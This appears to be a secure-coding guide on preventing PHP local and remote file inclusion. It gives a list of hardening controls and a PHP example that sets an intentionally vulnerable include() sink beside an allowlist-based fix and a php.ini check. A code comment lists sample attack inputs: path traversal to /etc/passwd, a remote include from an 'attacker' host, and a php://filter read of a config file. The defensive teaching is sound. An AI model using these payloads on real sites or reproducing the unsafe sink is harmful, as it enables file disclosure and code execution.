To prevent file inclusion vulnerabilities (LFI and RFI) it's wise to:
- Keep the system and its services, including web application frameworks, updated to the latest version
- Turn off the display of PHP errors in production (`display_errors=Off`, log them with `log_errors=On` instead) to avoid leaking the application's path and other potentially revealing information
- Use a Web Application Firewall (WAF) as an additional layer, not as the primary control
- Disable PHP features that enable file inclusion attacks if your web app doesn't need them, e.g. `allow_url_fopen` and `allow_url_include` (both are `PHP_INI_SYSTEM` settings, so set them in `php.ini`, not at runtime)
- Carefully analyze the web application and allow only the protocols and PHP stream wrappers (`php://`, `data://`, `phar://`, `expect://`, ...) that are actually needed
- Never trust user input; validate it before it reaches any `include`, `require`, `fopen` or similar file-handling sink
- Implement whitelisting (an allowlist) of permitted file names and locations; use blacklisting only as a secondary measure, since blocklists are routinely bypassed with alternative encodings, null bytes, path tricks and wrappers
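The list above describes the controls in words; the following is an added example (it is not code from the original page) showing a typical PHP inclusion sink in its vulnerable form next to a hardened version that applies the allowlist and wrapper restrictions from the list, plus a check of the php.ini settings mentioned. The parameter name `page`, the `templates/` directory and the page names are assumptions made for the example.

```php
<?php
// Added example, not from the original page. $page, templates/ and the page
// names are assumptions; adapt them to the application.

// --- Vulnerable pattern: the user controls the include path directly. ---
// ?page=../../../../etc/passwd%00 (LFI on old PHP), ?page=http://attacker/x (RFI
// when allow_url_include=On) or ?page=php://filter/convert.base64-encode/resource=config
// all reach include() unchecked.
function renderPageUnsafe(string $page): void
{
    include $page . '.php';
}

// --- Hardened pattern: the user value is only a key into a fixed allowlist. ---
const TEMPLATE_DIR = __DIR__ . '/templates';

const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolveTemplate(string $page): ?string
{
    // 1. Exact allowlist match. No path separator, wrapper prefix or extension can
    //    be smuggled in because the request value never becomes part of the path.
    if (!array_key_exists($page, ALLOWED_PAGES)) {
        return null;
    }

    // 2. Defence in depth: the resolved file must still sit inside TEMPLATE_DIR
    //    (guards against a mistaken allowlist entry or a symlink in templates/).
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . ALLOWED_PAGES[$page]);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

function renderPageSafe(string $page): void
{
    $path = resolveTemplate($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// --- Runtime check of the php.ini hardening recommended above. ---
// These are PHP_INI_SYSTEM settings: ini_set() cannot change them, so this only
// verifies that the deployment is configured as intended.
function iniHardeningInPlace(): array
{
    $off = fn(string $key): bool =>
        filter_var(ini_get($key), FILTER_VALIDATE_BOOLEAN) === false;

    return [
        'allow_url_include' => $off('allow_url_include'), // blocks RFI via include()
        'allow_url_fopen'   => $off('allow_url_fopen'),   // blocks remote URLs in fopen()/file_get_contents()
        'display_errors'    => $off('display_errors'),    // stops path disclosure in error messages
    ];
}

// Usage (assumes requests arrive as ?page=<name>).
$problems = array_keys(array_filter(iniHardeningInPlace(), fn(bool $ok) => !$ok));
if ($problems !== []) {
    error_log('Insecure php.ini settings still enabled: ' . implode(', ', $problems));
}
renderPageSafe($_GET['page'] ?? 'home');
```

The key design choice is that `$page` is never concatenated into a path: it selects an entry from `ALLOWED_PAGES`, so traversal sequences, wrapper prefixes such as `php://filter` and remote URLs simply fail the lookup. The `realpath()` prefix check is a second, independent guard, and the ini check surfaces a misconfigured deployment in the error log rather than silently trusting it.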